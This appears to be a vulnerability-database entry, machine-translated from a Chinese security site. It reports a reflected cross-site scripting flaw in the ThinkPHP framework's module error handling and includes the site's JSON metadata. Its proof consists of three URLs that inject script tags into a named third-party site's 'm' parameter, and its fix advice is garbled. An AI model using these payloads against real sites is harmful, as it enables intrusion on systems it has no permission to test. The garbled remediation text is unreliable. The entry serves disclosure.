Search...

ThinkPHP development framework xss-vulnerability warning-the black bar safety net

2011-12-26T00:00:00

ID MYHACK58:62201132721
Type myhack58
Reporter 佚名
Modified 2011-12-26T00:00:00

Description

Brief description: open source php development framework for default therexssvulnerabilities, leading to all use of the framework for the development of the system are presentxssvulnerability

Detailed description: does not does not exist in the module handle the error properly, leading toxssvulnerability

Vulnerability to prove:

To Super Rangers test

http://i.sucop.com/?m='"><script>alert(3);</script><"&a=login

http://i.sucop.com/index.php?m='"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&

http://i.sucop.com/index.php?m='"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&

Go and see

Solution: set a is better than filter it~~~

Author Hxai11

JSON Vulners Source

Initial Source

{"type": "myhack58", "published": "2011-12-26T00:00:00", "reporter": "\u4f5a\u540d", "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "ffcc1e356957ed5e5cf4e5d0ccc509f5"}, {"key": "href", "hash": "b46ed2612184573435d3ea42d47d54ad"}, {"key": "modified", "hash": "48989ce16a7539f175b7f00189e0d2fa"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "48989ce16a7539f175b7f00189e0d2fa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "645396391020478112635e14b34a0f8b"}, {"key": "title", "hash": "6baac271a1932b794686f270b6302bb0"}, {"key": "type", "hash": "0665a8b0792e65b50ab13aef58a018dc"}], "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "hash": "e461f6b46b455e7a6129f70be512abf9cb46447edcc60d95a708f39bbd1329d8", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "vulnersScore": 5.0}, "edition": 1, "viewCount": 2, "id": "MYHACK58:62201132721", "history": [], "references": [], "lastseen": "2016-11-11T18:10:49", "objectVersion": "1.2", "href": "http://www.myhack58.com/Article/html/3/62/2011/32721.htm", "modified": "2011-12-26T00:00:00", "title": "ThinkPHP development framework xss-vulnerability warning-the black bar safety net", "description": "Brief description: open source php development framework for default there[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)vulnerabilities, leading to all use of the framework for the development of the system are present[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)vulnerability\n\nDetailed description: does not does not exist in the module handle the error properly, leading to[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)vulnerability\n\nVulnerability to prove:\n\nTo Super Rangers test\n\nhttp://i.sucop.com/?m='\"><script>alert(3);</script><\"&a=login\n\nhttp://i.sucop.com/index.php?m='\"><script>alert(0 2 1 4 5 5 9);</script><\"&a=help&\n\nhttp://i.sucop.com/index.php?m='\"><script>alert(0 2 1 4 5 5 9);</script><\"&a=help&\n\nGo and see\n\nSolution: set a is better than filter it~~~\n\nAuthor Hxai11\n"}